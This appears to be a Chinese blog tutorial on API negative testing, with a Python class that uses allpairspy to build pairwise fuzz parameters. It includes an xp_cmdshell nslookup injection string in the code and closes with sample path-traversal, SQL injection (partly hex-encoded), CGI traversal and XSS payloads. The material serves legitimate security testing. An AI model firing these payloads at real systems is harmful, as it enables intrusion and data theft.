- 在接口測試中,經(jīng)常被各種逆向場景所困擾,之前我都是用的微軟的PICT工具來生成逆向參數(shù),拋開其他缺點(diǎn)不談,主要是只支持windows
- 下面用python的模塊來完成這項操作,以下是簡單demo,可以根據(jù)自己實(shí)際需要擴(kuò)展
import uuid
from collections import OrderedDict

# pip install allpairspy
from allpairspy import AllPairs
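class BaseFuzzParams(object):
    """Generate negative-test ("fuzz") variants of a valid request-parameter dict.

    First step of automatic fuzz-parameter generation: every key of the valid
    dict gets a small set of negative scenarios (correct value, empty value,
    wrong-typed value, key removed); ``AllPairs`` then combines the per-key
    scenarios into a pairwise-covering list of request dicts.

    Entry point: ``param_fi(d)``.

    Args:
        d: dict of valid (positive-case) request parameters.

    Returns:
        list of dicts, one per generated scenario; each carries an ``info``
        string listing the per-key scenarios it combines.

    Raises:
        Nothing raised by this class itself; ``AllPairs`` may raise on its
        own input constraints (see ``param_fi``).
    """

    # Scenario codes stored in every per-key scenario entry.
    _CODE_OK = 1
    _CODE_EMPTY = -1
    _CODE_WRONG_TYPE = -2
    _CODE_DELETE = -3

    def __get_data(self, d):
        """Return ``{key: [scenario, ...]}`` with the general scenarios for each key of *d*.

        Each scenario is a dict with ``info`` (label), ``code`` (one of the
        ``_CODE_*`` values), ``key`` and -- except for the delete scenario,
        which carries no value at all -- ``value``.
        """
        data = {}
        for key, value in d.items():
            # General rules applied to every parameter.
            data[key] = [
                {"info": "正確的值", "code": self._CODE_OK, "value": value, "key": key},
                {"info": "為空", "code": self._CODE_EMPTY, "value": "", "key": key},
                {"info": "錯誤的值", "code": self._CODE_WRONG_TYPE,
                 "value": self.__param_format(type(value)), "key": key},
                {"info": "刪除", "code": self._CODE_DELETE, "key": key},
            ]
            # Other rules (e.g. path traversal, XSS, injection) would be
            # appended to data[key] here.
        return data

    def __param_format(self, key):
        """Return a deliberately wrong-typed sample value for a parameter.

        *key* is the ``type`` of the original value (``__get_data`` passes
        ``type(value)``). Types without a dedicated sample fall through to the
        string ``"null"``.
        """
        if key == str:
            return str(uuid.uuid1())
        elif key == int:
            return 963852  # a random integer would also do
        elif key == list:
            return [str(uuid.uuid1())]
        elif key == dict:
            return {}
        # NOTE(review): the two string-keyed branches below are never taken
        # when called from __get_data, which always passes a type object; they
        # are left as the author's extension point. "path_traversal" returns
        # None implicitly.
        elif key == "inject":
            return "t'exec master..xp_cmdshell 'nslookup www.google.com'--"
        elif key == "path_traversal":
            pass
        else:
            return "null"

    def __set_fuzz(self, d):
        """Expand the per-key scenarios of *d* into pairwise request fragments.

        Returns a list with one entry per pairwise combination produced by
        ``AllPairs``; each entry is a list of one-key dicts
        ``{key: value, "info": label}``. The delete scenario yields a dict
        carrying only ``info`` so the key is absent from the merged request.
        """
        combos = []
        for pairs in AllPairs(OrderedDict(d)):
            fragment = []
            for scenario in pairs:
                key = scenario["key"]
                code = scenario.get("code", -9)
                entry = {}
                if code == self._CODE_EMPTY:
                    entry[key] = ""
                elif code == self._CODE_DELETE:
                    pass  # deleted parameter: no key/value, only the label
                else:
                    entry[key] = scenario["value"]
                entry["info"] = key + scenario["info"]
                fragment.append(entry)
            combos.append(fragment)
        return combos

    def param_fi(self, d):
        """Public entry point: return the pairwise negative-test request dicts for *d*.

        Args:
            d: dict of valid request parameters.

        Returns:
            ``[{...}, {...}]`` -- one dict per pairwise combination. Each dict
            holds one value per non-deleted parameter plus an ``info`` key
            joining the combined scenario labels with commas.
        """
        if not d:
            # Nothing to vary: do not hand an empty parameter set to AllPairs.
            return []
        # NOTE(review): AllPairs may reject a parameter set with fewer than two
        # keys -- confirm against the installed allpairspy version.
        fragments = self.__set_fuzz(self.__get_data(d))
        data = []
        for combo in fragments:
            merged = {}
            for entry in combo:
                merged.update(entry)
            # Rebuild ``info`` last so the per-entry labels merged above are
            # replaced by the joined list.
            merged["info"] = ",".join(entry["info"] for entry in combo)
            data.append(merged)
        return data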
if __name__ == "__main__":
    # Demo: expand one valid request dict into its negative-test variants.
    sample = {"user": "name", "id": 1001, "pwd": "!@#$^&*", "data": {"test": "hello"}, "my_list": ["1", "2"]}
    print(BaseFuzzParams().param_fi(sample))
- 還可以加入些其他的逆向場景,如路徑遍歷,注入,超長參數(shù)等,舉一些例子供大家參考
- 路徑遍歷
../../../../../../../{FILE}
../../../../../../../../{FILE}
..%2f{FILE}
..%2f..%2f{FILE}
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
a'
?
' or 1=1
y or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
# cgi
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}
AT-admin.cgi
AT-generate.cgi
# xss
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
OPTIONS
GET
HEAD
POST
PUT
DELETE
TRACE
TRACK
CONNECT